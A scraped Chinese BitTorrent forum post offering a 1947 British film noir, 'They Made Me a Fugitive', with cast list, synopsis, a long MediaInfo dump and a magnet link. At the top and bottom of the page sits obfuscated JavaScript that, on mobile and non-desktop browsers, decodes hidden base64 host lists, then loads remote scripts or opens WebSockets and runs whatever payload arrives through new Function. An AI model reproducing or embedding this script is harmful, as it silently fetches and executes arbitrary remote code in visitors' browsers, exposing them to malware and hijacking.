他们使我成为亡命徒[中文字幕].They.Made.Me.A.Fugitive.1947.1080p.BluRay.x265.10bit.FLAC.1.0 8.69GB

版主小s 1月前 247

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 他们使我成为亡命徒

◎片 名 They Made Me a Fugitive

◎年 代 1947

◎产 地 英国

◎类 别 剧情 / 犯罪

◎语 言 英语

◎上映日期 1947

◎IMDb链接 https://www.imdb.com/title/tt0039895/

◎豆瓣评分 7.5/10 (94人评价)

◎豆瓣链接 https://movie.douban.com/subject/4923966/

◎片 长 99 分钟

◎导 演 阿尔贝托·卡瓦尔康蒂 Alberto Cavalcanti (id:1077616)

◎编 剧 诺埃尔·兰利 Noel Langley (id:1016928)

◎演 员 特瑞沃·霍华德 Trevor Howard (id:1055551)

Phyllis Robins Phyllis Robins (id:1140492)

Vida Hope Vida Hope (id:1100012)

山姆·基德 Sam Kydd (id:1102896)

杰克·麦克诺顿 Jack McNaughton (id:1120839)

玛丽·梅罗尔 Mary Merrall (id:1121934)

Cyril Smith Cyril Smith (id:1151519)

John Penrose John Penrose (id:1126228)

Beatrice Varley Beatrice Varley (id:1150229)

Diana Graves Diana Graves (id:1093533)

查尔斯·法雷尔 Charles Farrell (id:1086906)

莫瑞斯·德纳姆 Maurice Denham (id:1084695)

莎莉·格雷 Sally Gray (id:1005542)

塞巴斯蒂安·卡伯特 Sebastian Cabot (id:1010696)

Michael Brennan Michael Brennan (id:1028705)

格里菲斯·琼斯 Griffith Jones (id:1041752)

蕾妮·雷 René Ray (id:1051446)

巴拉德伯克利 Ballard Berkeley (id:1064748)

Gordon Court Gordon Court (id:1078385)

Howard Douglas Howard Douglas (id:1082730)

彼得布尔 Peter Bull (id:1002866)

诺埃尔·兰利 Noel Langley (id:1016928)

Marius-Fran?ois Gaillard Marius-Fran?ois Gaillard (id:1093871)

奥托·海勒 Otto Heller (id:1036239)

Andrew Mazzei Andrew Mazzei (id:1026476)

盖伊·汉弥尔顿 Guy Hamilton (id:1050116)

◎标 签 英国 / 黑色电影 / 犯罪 / 1940s / 黑色 / 1947 / AlbertoCavalcanti / 经典

◎简 介

In this gritty film noir, cynical ex-RAF flyer Morgan, bored with civilian life, joins a break-in gang led by Narcy. On his first job, the getaway car crashes after killing a policeman. Morgan is framed as the driver and sent to jail. Seeking revenge, he escapes and heads for London. Along the way he's helped by a woman (Mrs. Fenshaw), who wants him to murder her husband. In Lo...

◎获奖情况 (共1项)

第8届威尼斯电影节 (1947)

国际奖 国际电影大奖(提名)

└──阿尔贝托·卡瓦尔康蒂 (id:1077616)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 93474267625879395322369736274738962676 (0x46527D35FCD08FE8D380B4B8D80C60F4)

  4. Complete name : They[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.68 GiB

  8. Duration : 1 h 40 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 12.3 Mb/s

  11. Encoded date : UTC 2021-10-17 12:03:19

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 40 min

  21. Bit rate : 11.6 Mb/s

  22. Width : 1 480 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 1.370

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.303

  31. Stream size : 8.18 GiB (94%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=21.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1480x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : FLAC

  39. Format/Info : Free Lossless Audio Codec

  40. Codec ID : A_FLAC

  41. Duration : 1 h 40 min

  42. Bit rate mode : Variable

  43. Bit rate : 611 kb/s

  44. Channel(s) : 1 channel

  45. Channel layout : C

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 11.719 FPS (4096 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossless

  50. Stream size : 441 MiB (5%)

  51. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. ID in the original source medium : 4609 (0x1201)

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 38 min

  63. Bit rate : 54.2 kb/s

  64. Count of elements : 2495

  65. Stream size : 38.3 MiB (0%)

  66. Title : chs&eng

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No

  70. Original source medium : Blu-ray


  71. Text #2

  72. ID : 4

  73. ID in the original source medium : 4610 (0x1202)

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 38 min

  79. Bit rate : 54.7 kb/s

  80. Count of elements : 2495

  81. Stream size : 38.7 MiB (0%)

  82. Title : cht&eng

  83. Language : Chinese

  84. Default : No

  85. Forced : No

  86. Original source medium : Blu-ray


  87. Text #3

  88. ID : 5

  89. ID in the original source medium : 4611 (0x1203)

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 1 h 38 min

  95. Bit rate : 32.7 kb/s

  96. Count of elements : 2495

  97. Stream size : 23.1 MiB (0%)

  98. Title : chs

  99. Language : Chinese

  100. Default : No

  101. Forced : No

  102. Original source medium : Blu-ray


  103. Text #4

  104. ID : 6

  105. ID in the original source medium : 4612 (0x1204)

  106. Format : PGS

  107. Muxing mode : zlib

  108. Codec ID : S_HDMV/PGS

  109. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  110. Duration : 1 h 38 min

  111. Bit rate : 33.2 kb/s

  112. Count of elements : 2495

  113. Stream size : 23.4 MiB (0%)

  114. Title : cht

  115. Language : Chinese

  116. Default : No

  117. Forced : No

  118. Original source medium : Blu-ray


  119. Text #5

  120. ID : 7

  121. ID in the original source medium : 4608 (0x1200)

  122. Format : PGS

  123. Muxing mode : zlib

  124. Codec ID : S_HDMV/PGS

  125. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  126. Duration : 1 h 38 min

  127. Bit rate : 47.1 kb/s

  128. Count of elements : 3072

  129. Stream size : 33.1 MiB (0%)

  130. Title : eng

  131. Language : English

  132. Default : No

  133. Forced : No

  134. Original source medium : Blu-ray


  135. Menu

  136. 00:00:00.000 : en:Chapter 01

  137. 00:07:21.482 : en:Chapter 02

  138. 00:15:36.268 : en:Chapter 03

  139. 00:24:37.267 : en:Chapter 04

  140. 00:33:32.427 : en:Chapter 05

  141. 00:40:10.866 : en:Chapter 06

  142. 00:48:33.577 : en:Chapter 07

  143. 00:58:02.312 : en:Chapter 08

  144. 01:06:35.199 : en:Chapter 09

  145. 01:16:41.847 : en:Chapter 10

  146. 01:22:58.306 : en:Chapter 11

  147. 01:34:13.189 : en:Chapter 12




复制代码


TAGS 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:4555A99AFF0AC16374839C34893A7127CDCDAA83

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};